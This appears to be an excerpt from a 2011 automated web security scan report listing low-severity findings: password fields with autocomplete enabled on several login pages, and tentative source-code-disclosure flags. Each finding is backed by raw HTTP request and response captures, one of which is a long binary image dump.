14.15. http://www.fetchback.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.fetchback.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://fido.fetchback.com/fido/j_spring_security_check

The form contains the following password field with autocomplete enabled:

j_password

Request

GET / HTTP/1.1
Host: www.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:47:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 26 Aug 2011 14:37:11 GMT
Accept-Ranges: bytes
Content-Length: 9526
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 15:47:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="fHolder">
<form name="fetchback" id="fetchback" method="post" action="https://fido.fetchback.com/fido/j_spring_security_check" class="client_login">
<input name="j_username" type="text" class="userfield" value="username" onfocus="this.select();" />
...[SNIP]...
<input type="hidden" name="_spring_security_remember_me" value="true"/>
<input name="j_password" id="j_password" type="password" value="password" class="userfield" onfocus="this.select();" onkeypress="l_keypress(event);" />
<a href="#" id="go" onclick="javascript:document.getElementById('fetchback').submit();return false;" onmouseover="goBtn.src='hpimages/button_go_clientlogin2.jpg';" onmouseout="goBtn.sr
...[SNIP]...

14.16. http://www.oraclecfo.com/Authentication/Login_w.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.oraclecfo.com
Path:	/Authentication/Login_w.html

Issue detail

The page contains a form with the following action URL:

http://www.oraclecfo.com/Authentication/Login_w.html?url=LwAAAG8AAAByAAAAYQAAAGMAAABsAAAAZQAAADAAAAA5AAAALgAAAGkAAABjAAAAbwAAAA==

The form contains the following password field with autocomplete enabled:

ctl00$cphPlaceholder$ctl00$txtPassword

Request

Response

14.17. http://www.oraclecfo.com/Main/Home/Home_w.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.oraclecfo.com
Path:	/Main/Home/Home_w.html

Issue detail

The page contains a form with the following action URL:

http://www.oraclecfo.com/Main/Home/Home_w.html

The form contains the following password field with autocomplete enabled:

ctl00$ucNavigationBar$LoginBar_w1$txtPassword

Request

Response

14.18. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.oraclecfo.com
Path:	/Main/Solutions/Solutions_w.html

Issue detail

The page contains a form with the following action URL:

http://www.oraclecfo.com/Main/Solutions/Solutions_w.html?mode=1&articleID=2243&categoryID=82

The form contains the following password field with autocomplete enabled:

ctl00$ucNavigationBar$LoginBar_w1$txtPassword

Request

Response

14.19. http://www.shopify.com/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.shopify.com
Path:	/login

Issue detail

The page contains a form with the following action URL:

http://www.shopify.com/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

15. Source code disclosure previous next
There are 10 instances of this issue:

http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png
http://platform.linkedin.com/js/nonSecureAnonymousFramework
http://reviews.fekkai.com/module/5113/cmn/5113redes/display.pkg.js
http://reviews.gillettevenus.com/module/4746/cmn/4746/display.pkg.js
http://search.oracle.com/search/search
http://www.cvs.com/CVSApp/js/functions.js
https://www.cvs.com/CVSApp/js/functions.js
https://www.cvs.com/CVSApp/js/userprofile.js
http://www.dove.us/Resources/JS/dove.js
http://www.netsuite.com/portal/javascript/NLPortal.js

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

15.1. http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://blogs.oracle.com
Path:	/otn/resource/1OTN-2col/OTNHead-Short.png

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /otn/resource/1OTN-2col/OTNHead-Short.png HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 21:01:53 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=3600+360;age=372;ecid=47465485677722335,0:1)
Vary: Accept-Encoding
Content-Length: 38457
Expires: Tue, 06 Sep 2011 16:12:52 GMT
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

.PNG
.
...IHDR.......n.......J.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>_/V.....IDATx...i....-x...Sf..4"..... a..e4x.c.V..
x..W?.e....`Cy....v......U.]F....U.@..^#....H.f.MhV...S...>
...[SNIP]...
<...a{4.k...|..$*~..E...]..........b.V.x...%.o..=A*.....l`....`.^.v........[P{.........Fw..w.,...)....+...\.p..js.... [.....z...N<?...}.......}...p.z&v......U....L`
`4T.P.B.    x..P.[....S+{1.TQ    ....[U.....;3.q....t........v.A....
}a....t.I..Fbi..w}.q..A.j.@...@y....n....FH.v.0.."=u.{...5..................i....A..C!..E....c..*..........K_.%.Q..Q2.$H..%.n.hZ......h.W.rN%.......A:..?.x......V....p....`...Q.i.C...o...}.^.0.....,.6...PxJ.>jR....V..w.....=...g.Ghx..v..d..e..v;.....f........m.?.1...c7F;w.............,$5S.........J...~.[~_./..h....'...
.-...:@..h.P.B.:#....C...|z.....Cr.&.K.zo.:.....#.r|b...IO.f-.......A...W..2..'...{..\
C..^)W.S...a.N...Q.V.3f.6...IL3........X.._w..!.~....#.+k....,.<..wRZHL.)cU...\...../~..b..\......Lb...Z.O.?......1$",.(..E.......8.../.(...K.p.yQ......N..4..    Q.
.|.......Q..t...    ..WC..3....Mk.<........iQ...8$.:.<.d3...]pvv....+?0.G.|.k..-....}....D.R.v.o...'7..~...Q.....u..l.5....K.T.1._..[...E{2..70.....:..[....HV{.
..Q&. ..t....0.*T.P......J........ko.f..2..%."............!....yC..}(H...n....Vbo....2S..H'...K["..Br,...CG..N.
#R;..
&&ae.$.F....#s....I.Q...y.K.S.E....t..n.$Q...g.r....(.$...3.?g.o.8.....V.k4..F.!..\~X'..}t.9g.V...8...O.G......{..g.l..~....^.2g</
m..E!.]..I    #.YH...b.
9
..&GI.7. .].C..q....../%......L.zUX.}...G>b.....c.
J..._......{.....d..............hO.........v.u..Gw......j..s........L..II/S\}..a.t...*......BL..!@......d.....,J5..g&5..h.P.B.zM.Q..0wflq.f?.....L09.b.9vQ..fo..5$)....^&...K......Fin.vl?_O.z.x......mz.E.W.......`Z..R...SG.$!q.......jd..d.7....=....#'[qC.e....N....U#4....`.U.......V.NxT....'o|..r...|.5&..u.'c\...}.x.I/}..8.    ..C.............x../{..h.K.J.P%S.[n..y.    ....."c...5...O~.M|3..B'd,.L......{.|5..'...$..w..;k'..j......;..i.....gT.....k_.x.,V.........A....o..p....(...q../......|.>......o......G...7_2j.a.......o_....`Tf..K....o."WN......~.5..........    B%U.,"..Q.=.
.|FC.
.*T.......Vu!0....MZcSu.%.[\j..\Mo*.)L.~4.y......Qrn6.....%..}R(5....j.O.9T7....u,.n.F.na...).R...D....kq!k.c..+...X....3*!a.........W..O.n5...Z$.(..E...z#!$.. ..7.i.5{.....=...+......y...D3I...q\.q....?....6L.]=....H....'...;w...o.Yg...,...b.....c....>K..g..G.S..4jq..5.u.C..$%..dV...z9Rr..L..:.......}..
.~..X.......?..\l.........aC|....6....Y.-[..h*Q.f^.{.nN........}....;..=h.F...RM..........E..t[..._g..v...K<j.,.X.......3.3.mX.A..A?#.q.}.....`4T.P.B.ZJ.
`....a.|..D.{.Xs..d(.b...#......{..m.'/...ge...T....6HT...,`...M.X..9V.k..    ...LK..E\#o.M.I$.&g.R.....]T.r...VRo.qm...d.t .q4.... .m&qZ.~^H\K.b....`.P4.....+....W..]?-....R5..g..........ZM"S...G......r.y..Jd..g.F.%k.67.....9JE. 4&p0F......6.z.6..s....sv...i.a\..j>l..;...4q...lS2.bvC..Oj...&..D@...tOo...n.v.. ..w.......o..7.k.......S.p=..>..'.w..o...)....>...N{..m...b~.`\|.9...e....O....|...}.z.)/.trR.Q/.^?.....HP..
t.&0.C..    ...
.*T........>.xu..t#A..R.}.4 Kq......qj.zm....s..[....E.RD-...m\....$..%N'...+A.z......:W.    .(...?|p ...p........r..wd.gig...$.8..f&....|..{...?...'.|7)..k.g.g.`...%..$.<g(IH..../_.GkP6X.f..E.zM`..............o"..g..B.....!.8....&...[.~....P.f.C..O%..:7..CppaZ...M..n..........@Q.ro.h~...p...v..A....E..
..-........g..a..S..9.h.^...=h..a.X.......,3n....*.3b\.^..P.a.x.W..R....f..L+.....*T.P.%).....`......\HH.Q7Y...U#...N..$.........kE.U...a....r1....Bev.....Pd4J .....-EU1.3.W.@....i.:.
.h..."+.......&W_........z.Q...Q.I.8>.j...q...Q..$q.2H..#.'Q....w....ZAwaQ..(...E.....sE.....E.L6Z.4..Yv`....p.Y...N6.u.%d\5...[....../.v......dber.A..p.z...4.(v.{...........B.s.p..el..d..ma.e...."{..H..e..A..=..pr9.    .0v..'&.#"..{.VV..K.2.?\.#.....&+...PXQ.r....w......0.*T.P.^sf..H..m..W..\P.d......FIk.b..~...P.|..y..6.R8..W..%...V.7...k.3sK..,{....z...D.D.~jtSj...JX.2.......|b...l..u..$"qB.z.7...+.W.bRc<......i....%q. .bj..W.....X.N.....SSM..={.n7X...b..M.Otz..'.w...l...7^.N>.d..
5Uj@...C.........B9..R...#D.. ..t3.h.Qu..z..N./.....-.9.B.........p.I.}(....?.8...\,w.T....`yx...rZ..0./*.J.2..Y.....G.....M....q..8....3..B.
..5fFE.....H'wGw:&.<.68..r.7t\.M..O.6..%.....UH..E.^
!w.G\..3..U.I.<.B.t..gS...B....X...fM"H.!.A}n...I^.qT.k.F...$.4.I....5k.6...:..}........,...&.6..;......K...uk'7.3;95.....t.....}.O..;......d...........9....L..q...$.c...@.u....+./1..pG..x    .X....%h.[...Dx..fzTA/Lt...P._V.    .......%..cpb....WHy.+.X..U..W...+..H....6<"...[.....fK.;.N..6.Yk.......W..{....5}..h...B.
.*.....E...F.T..p0..H...u.Q.V5X..".e/l....e{.*\..
....f.b.U.:+^3T.....6i....s.U.=...o./.`.].b...wJ0..N....mD1M.8.Y.aB.Mr.......
.j...........'.m\...g...7.....F}RO.*(K.l.9......k..Y........9.kW.]........h...g.&    .....N.p....4/8.....{..Q.F....(...v.)........>1..Z.S.=H....G...`.b....v&......./..W.E.p.....8.bn.-G...y
...X........:.e......w......t).0.*\.)@O..f.3...\........J.e.    ...0...Eu._;Q..X`.i.9..f4T.P.B.zu~..E.....J*....v.:...ym..n.L.o......4...#;$*..t........27...ch.
....e.Z.rEDb..9.........V2?.........p.7....U.%..F.GQ..Gs..........?{..g?..?x.;.,.bwn..}.8.4..P.&.q...+....lq~|..........-o...I..z.....&c..Fw.X...._.:.......8dp.D.Y.N.uXVD..1m.k
.s.;...`4...~.
2....q.w..x.{........^Q..U..vs...;..{..O<......#<=.R...2..\.i.....E..N..........UH.../.S.R....w...h.P.B.
.NG..,/u.\.......L.^g.{a.....-..TA....5......3v._.YMl.B...p......}p}^/..iC.^..y.&r.$fn...s(J.^.)EE..VMP.......b.j4.<o...........=.n............3....x......9. Y...\u".}e..c.....Z.v.;...y9.#.S$.y....&..........L'y.....PVq.s'...aMb.(j6k4.J.$wC.D...4z&nI9.......X....U^..i~...e<...\a1.y.N.r...~..?z..WP.}.8`.u..r0....r.#.pc..    9.~,..P)..K@.w}.Q.....5+"...5=..b..<)...1K^.%y`....NP|&.....*T.Pg.9j..D;..    8.....-.x$C.n..g..D...b). .;...T..6-.2`..}..&".Ojf...&ghaQ...S.E.....X...k..b7M"". ...&1.. .6.:..F.q..._t...G.`    R............m..........t.........ho#J%.[w...........Y6>Y?rrq..[.iCg1.....'..I0yr.7.n..3.e.q6..d{.F....,+
e..%......'q,.M,13*.........9`...@.........|d.#....}.l.\J...V.#.....K.T=Y...|....^.k.....;.....B.*.....`p^......9..P....`vV...w.......
.*T.P.....Z..a'...&e:....L.(..,....Z8.J...,.5+-sF.i.;Z.U.U5a..l..    AnJ..,..G.^4....&.V....r<.H....Of.c..x...QLI.E.....h..f(y...Z..O?............|..............N.....}...I...=...W.].UB....F...i'..3._..o....:m.['.33...^7. .1. B...i..x('..p.i......&..T..7......E0....f{j.Y..#d....4............}...%...+...dE...K...[..........kb..r28.o3..\....\e.W...|o1.......hL\.....G.~.B.:....#..L..0.*T.P.B.......8......I.O2..Z.ml..t.I....U...>....\8..r.A.Cj.R..Q.v.'.A......:&....t.... ...T.v.9..z.zBH...D...X.xw8....H....    [.
"...a..0.#.s.....3.7.x._t.../............^~.......O...............$.1...7b...G:.V..V.....{.tz.^......h..$...f...".3<.Y..r[.B4.....q..Clg...q3.D...Y.+..U..K##7......l.5|.j......?..m..K6C...N.s........z../..b'.,.i.s.J.B.....D.6.v...R"V.d..=.|..+.o.P.............1..&.`;Bk    f...Y.'6...=....
.*T.P...eZ......p.&,.IL..Xb.i}...U...g.+..Fs....`.......:...N.j.`.3ba..8,....*f*S3....r..Li...\4.I...::..O..v.....Tn(.$..ED.$.H.sm...o.)9..u..{.~.....~ -.+.}_..?..wb....5[.7.=k.....P.H.E..|..Wo..;.!2.M.y......v.....TF...jzT...u....q.......z...Ln....63.'.QC"u...6 x....D.<.;.@.{D..v....u....,{.-    ..l".S_j..(....QS.>>.....t..^x...D.(.K/....0.&....c....g$.=M&.....,.C.v..|&G....l]...B.
.*.i.Q.s.....W...d....'...|6.....X..K....>.....BL.....Z4<.0..~.8<....:.T....F.I3.2V..7c...MOM.r.{.h........Z-.D!......D*....E..M....V..C......E..Z..N./.4.z....+..c..$............1.....}'7m.~.[6.I.*.%....l0L......5]...F.F(..:s'...j$.U.j...<7l.......3..hR..]..C..W.;.....\..2.6...._...N..y...{.".b..m.Zf......a....7.ow..u....v...{.&'7...zd.\......:..}|...r.{....{..-[.:'&........}.#G...o.W.......N......O...k........;;+7q...vl..J.k..yZ.o.......G~.|cg~...-....!~.MN.....y........;..={.n..U......{....}......as.'''.[.j...:...w...;v.Y..!.>T.P.B..0....^.ZL...%..bV.Zs...!.....xpI..d|c.....z+.F..t42$.J.P..y..QOPU.^.#..        ~i.B...........8R...L...8z..'._.i..U3I..i..Kc..Z.P.#........xV.*.3.......c/<.a......o....K|.N..#...f......N.?0........../.....;...L..H.h.....Y5....M.Dn......;...,.(..tz.d}b...:.......M..z..........=4......P.}d.#..n..\..;.....q...........W.....#..J....}..k.........m...+? ..'o..|E....> .....,..w.....D.P.A%.|...>....~...~....o..#.#.../^..;....E.....P..y....z..._.m../}.....f.).....=....W.....F.......|.....7J(y........w...z........w.y...+..>.F    :%....?....F=.[%.(7.K_....F..C...M..3...c'...B.h.P.B.z....M.T..X\hC ..F_.. ..H4Q....-.
HQ.:.........s.v..[n....VZ..[i....Y..c...W..i.....c..Z........Q....WM.^.~....A*...v.R..D.P.2N......"..hq.3............/..u....I....O(..+oD.gb8.Z..H"...._.....1V.V. .
..j.I..h..i.X..oI.T.'!M...N...M.L....E..D&u0...G....Q...[......u.v3.[.....$j../B..../~....,t.......V.\~...._/t...7.|.u.=....].#.<....*.v.}.m..O...;.m........s.....w.....[../..=...G?...kn..&...7.,...T..y..N.s..........$Q.-.~.....7$^...w..3B..o...~.}..b !...../..+..D.....w]{...?,.....?...r....O..Y....g..xt.y.....={.|..3.`4T.P.B......H....oU....X....#.?2..+*...M.iQ...N.........h..MZ7...=9    ./.R....Q.....q....3..x..?.....f.U.q....D$.ps...(B...Y...8..e*..R.S...rTO...GJ..U$...$.c...u...-&
JT.\.-......) .r6...]...t3y..g3FY!.\.~6.x.=>=3.h.i..G..e..3.Y.;.G4...!I.!..$*.
..B).....#..%.F..a....W.RZ.....<E....O.yX......Z.+z....-#..s.D...3....~.*.Y..^.m.|..>.w....fW].......w;....o......<.H..m.6.C.n..^X....q..T..K6_"?BB=....\-A....fV...}L..;.....n...^.+.. .+q............F....zxW.../...../x...k%...w..m...}L..}.6..W_s.b.....w...5...=.}.v......-[...*T.P...#....}...P...t...*.r.j....^....{R....^..w.J.A..G.I..~Uob.%,    l...y..    u.Z.Fa.%....[.l:p.....z..CY.aTHP.cZ.)..c.y.......b$a...l.b..<m$Q=.(...D........|1.g...2...|:.!O.dC.=....@O    (..JX....7..HG4..I..H.5s.8.y...........$NZ......f.VO$.,.B....    K."/..}!U....1...G.0......Q.2!.W.}..%Q..."Wt...}.z......_..._...;.j..........D.e..oS....AV.....*.....z...L....T.(..Y..iT    R........v........."_.._~V....N}.I..m..;..E.........B.r.~ML.7o.,!.........V%......7.#.xL.h.w..{rR..._...;...{.3.g.....~.[......@.0.
.*T....u .\.u.;r:i4jD.i..+......i6.    \.{C...a98.r.........Q.{.A.-X..    ..{...T.{:.N.7......3e....Y.    #O.,........{.b|.Kp.e
xj*Q...x    ).'$.....hY..\M.............dLH..a..$U.}.O.m....G1^=3!7*..A..>..P...pcj.5.Xnd/#1...+.......`K...o......w6...@B...H. ..$..p...TpR1.b9.J.S)c.\....*....    ..b..0fb1.@ !.F.h..zg...,.}K.....#;.`R|....{.t..g....>.S..%E.YY..........
..j.D!r...a_..CP.B.....\PP.d.J..x...L..*|..............>.:..H>...n...~p{{.........B......o...../../.]...w}.......VJ~..;n..G>*..7...-....._.%I.?..........n....4..9.....fn.1Vbo....{n.....z.....z......_....*..\../..j......M.e..<.........}...K..O..+fg....q................_{...q.m.._...~....B.........)I'Aw...y<.A:t....X#.&....@.V.9..1...8..c..3...ya... .Zf..uQ..ic#wP.. "...........j...H..KV.'.........($.."....%....C..$....K.........p........c....7.t..qL.$..*J..e#......V....n...?..........J._Y..hI..Y..9.BE.KF................*..uEr={..@m.e#..}.l(..%.>GU....0.............cH.y.E.....k~......I.(......|_r.s.]I..2.M7.)........|..7.t..7...$v.Mo...^..........}..../.......$.<..7...w....u...w.u....=r!.@.w/=r..,...._.....$..U....|Ss.Y......}0....W._...........<...r.A.w.k_.WEY.{....;....J...z.....q..w.y................'...|.\.........^'.......[oS+.jz........ZI.....uM..
+Rb.....Z.h.Gf\...i.&...7.....2...G..).y-...B.t^.......R.A....Y>.4.x.O.L...~.....%?.G../+(..1......~...-uo...\`.?....7u..#U....e..EQ.*fV.......n.?{.../..r.,..P.N.p*i;....?......wP...!a..j%rW..^R.......(......i....d...@.y.h.N<...0...._..b.......".jz..y..+("M)}5.....tUIM`&.^......l.*@.ii.I.2........a..Ew.[.\
.}...Eg.......1+.b.w.K...`..j.......en-`.X.9
.....Z....UE.I...h.8M./ .6.........:.W.i:..+.P.g.@.|S.+j&k^..H`.\    ......./g6.Q.....JU.s{......".z..I....i..RGFi^$q.i..U....c,.-.Ji.H..0".f...GV..Mo...D..#..RgD. ..(./C.q....cL.\Z..o.......Z$.0...h.).}Ik.IS.?../..?.t.0j..B.........0i.,...I W>.M...~..#..,..^........][[..Uc....u5.S...*.R.[.........P=N.+.\i.1w.....w%b.NT...9_u.....o...i.k...Q_.]g.72..h<..:.......Mu8.....    jH.jG..f..0.GQ.b    .m............)i...\..I.......4OF=<<<<<..............h.e|..G2.U.....:~IG..t%X..UV........y....9...0."....*.VmWa..@..!3|j..d.:......d..q.'.Q>..    .>*.X.S...Tr.@...#.-._>p...V.*_G2Vd..@2..,.5=T.G.c...v/...()*X..V.mO2..0 .b.
.'..i..7......J.}.\..a.&.-^...].Sq..y....{...........C.c..}..._...n....^'.)e.N'..*.H;..yf..'L...zZw..Wh}.............6....].....*....L.;Y.......R*h..L....Z....u:..h..Z..c..is.\.i.=u..Y?n..!.<...;{..l.,...!....QJO.:c..Eg..?..    .........M..d.......Y..%KX......5..HO..j...b.;.**...0z[.R..6.....`.qr.K..0$!.@.)%1T...,u..AW.T.6.......:{|h...9.P.......(.x..,W..(..    ..EN.*.]9J[.....}.K..G....+`.LF....X.L........a.....H.<......$ ..`2.K&.%....@
   .Y.>v.|8
{..`...."e.Uv....=....(....=J.q.........0d..(...o.;v.....;......D..p'IC    R...@.::.....t.]S[8....+.5.\.h7.(..`...n].W.......&~c?.C..P-.XC...`..h....j.[J {k..&]... ...-PE.6...UuOSjYLE....B....G-.D...A........u"..IP.....z2......q..h...,I.....6V.2.N...Y.5pa...@..l..&....b.. .$....+.'O.o.o....4....AWn.......n....S....Z]%...}...\..O<<:.X0.H.$..A.'...}....;...n..|..n..r...y.X:..L..n.......}.., E.z.T..0Ba.8.....r.e.....pRn.S*I....I.... ..#..(..$^......n|n.P...A..=..+...d4.X.tyb.8|.....S....o........kJi.UqS.E...t....fY..2.u....`n..=N..Em`. ....u.S..v..q[/4[r-.k....d..Kp{l.N._..G)PM    ..S...+h..L.TQ..^..7o...!0..W[6vnz....Ug.X.w....8.........P.u.M.)m............ x..$SqC...P..H).PUbS...Z1..}?8|.W.y....sk.....]s....K/=...........S^.....C&....vR#..(.....O.=..g>....`7.Z......g.......b...b........}..7.y..o...}b.....=.2.CW3TD.2.".k.Y...E.@.3.".%.r.-$..L4..6.....$.....H<..q.`.t%.0...O.....v.......L3Z2Z.$..H.Jt.N.$-.,c..........w..V.7...F(Vr{....r....A]...bU...p..9U2....87....m.m.E.EU@.pGh<.T.KnD.U..k.wT............h......v;CC...f..i.`..&..I....*..~$...f..8..+..@Q.......Q..........G.......ezpg...F*dS.,...Q6Y....Ps.P.v...9..G...._%e9...e.o.q.0*.~.........v......gn..../=.!L'i.c..y..U..^.......O
....9v.%....v..p...P.q(."........G..\..0@.V....;.1..y...Z.~......A.....z9...^.....=.X.F.a.(V/`.(..F...}s].$-D..q.h.....|..z..].....e..L.."....X.>.U.T.....MB..?..e.^z.UWdy.    ..r...Qc.....:.Z,....o....z..Y./.H,.....G.S...MLT
u...rA.....(...G....`=.R.....7:
............1.2C.:k...*sR..Jj.2..Z.Y...+7..7C.7..Mvl....L.8px..................J7...fJ..fXy.._.C...o59W..T.%3r
l"(........O..o|{.i/..[
.....a....v'
..
...u.w.....=..3E..............-.F.W5...c<...........8.L7...XQ.H$SLsA..6W........3{.,.{j--P[.....    ....I.ht...D....t4..0......).Iv<..<.)..6.x...}.=H.0.....1....S....GX.o..,.....F...1!y-.LS..($    .I.0Qr.F.....+_..f...)y.X.X.K.....Y...}v....jgu..........vo....w.`..
.....Ah.M.K?..l..d70?..z...p)......Z_..i...-952.+}....nIS.w...*g..(.".k7.ZQ......j...1..........&..3..8.....Z....z..Vi..`R....4...5.z.]@..M.0 q................0j.}.....l......+'...y.....h4..W...o..gi.u..m........y.3........rd.B......G........F...."a........R.....o.X.D.......2]...T/.Be..... 3.(/....e/
....B.1x..f X.....v|...57........n........|..........v..2M...$.%..$.U:).....    ..g.0^.\..P..>......`..LPI...$/...9.......D..Or......)....rb.....&c.05..4.7w...X..Y*.$..m..&..A.....7........(......S..zD`...m..U.g...#...U.Z7.m.....>.......s..^&I@.......g.{xxxx\P..r,....3..(....7>...t.......jk%[.I..q.W........`.v..oF.d2......${L..".S. !.d.j.3J..v......_..'..o.......~.qAE...u..@.)....h.. 2<.Yn.[    I.(R^...b..P........I.W...%Ii.$........,.xRJ.G...D......[X.MA..K.-.<0be...g.-R..R.n......v.yd..[...`SF.G.}......Q.. Qn.F%...q...2"W......CFK:.Op..+S..<x.E+.V.V.%?..Gq3....2S....j8n6......~.xO...\...Z.....F@..m2V#.K3`.(....    ..L..a..*OY0C(E3..-[..U.T....|....l..'.x....e....e.Y5....<....Q..{....)...].....zxxxx......3..Z.v;.0..j.(..,m9..4..D...bG.6..a..Nr&..?>.....v@..=..n.c.....3.....dL.=X.E.....`..BI.1i....N'..}.S..../..E.{.O...._....V0.n
N..T{.H.1.n.|.m...V.. .u..h.(D)/YY0..........{.............f..."....-...%.!..Q.&..$?qf...._{.|.
VW.HOa.....:N...ww...
...[SNIP]...

15.2. http://platform.linkedin.com/js/nonSecureAnonymousFramework previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://platform.linkedin.com
Path:	/js/nonSecureAnonymousFramework

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /js/nonSecureAnonymousFramework?v=0.0.1132-RC3.9082-1337 HTTP/1.1
Host: platform.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:33:08 GMT
Expires: Tue, 13 Sep 2011 15:33:08 GMT
Last-Modified: Thu, 01 Sep 2011 02:17:52 GMT
Server: ECS (sjo/5235)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 144326

(function(){
var l,
doAuth,
h = [],
valid = false,
a = "",
fwk = "http://platform.linkedin.com/js/framework?v=0.0.1132-RC3.9082-1337",
xtnreg = /extensions=([^&]*)&?/,
xtn
...[SNIP]...
<?js ?>";
l=l.split(" ");
var p=l[0]||"<?js",o=l[1]||"?>";
if(!p||!o){throw new Error("Template markers must be set.")
}if(p==o){throw new Error("Start and end markers cannot be identical.")
}p=new RegExp(b(p),"g");
o=new RegExp(b(o),"g");
var n=["","var p=
...[SNIP]...

15.3. http://reviews.fekkai.com/module/5113/cmn/5113redes/display.pkg.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://reviews.fekkai.com
Path:	/module/5113/cmn/5113redes/display.pkg.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /module/5113/cmn/5113redes/display.pkg.js HTTP/1.1
Host: reviews.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/?gclid=COTMo_SIiasCFQ6AgwodqEol4A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=243632410.732372977.1315345538.1315345538.1315345538.1; __utmb=243632410.1.10.1315345538; __utmc=243632410; __utmz=243632410.1315345538.1.1.utmgclid=COTMo_SIiasCFQ6AgwodqEol4A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=Direct%20Beauty%20Product

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 06 Sep 2011 11:58:57 GMT
Content-Type: text/javascript;charset=utf-8
Vary: Accept-Encoding
Content-Length: 112212
Cache-Control: max-age=890
Expires: Tue, 06 Sep 2011 17:00:28 GMT
Date: Tue, 06 Sep 2011 16:45:38 GMT
Connection: close

$BV.Internal.define("jquery.effects.core",[document],["jquery.core"],function(a,b){
/*
* jQuery UI Effects 1.8.6
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under t
...[SNIP]...
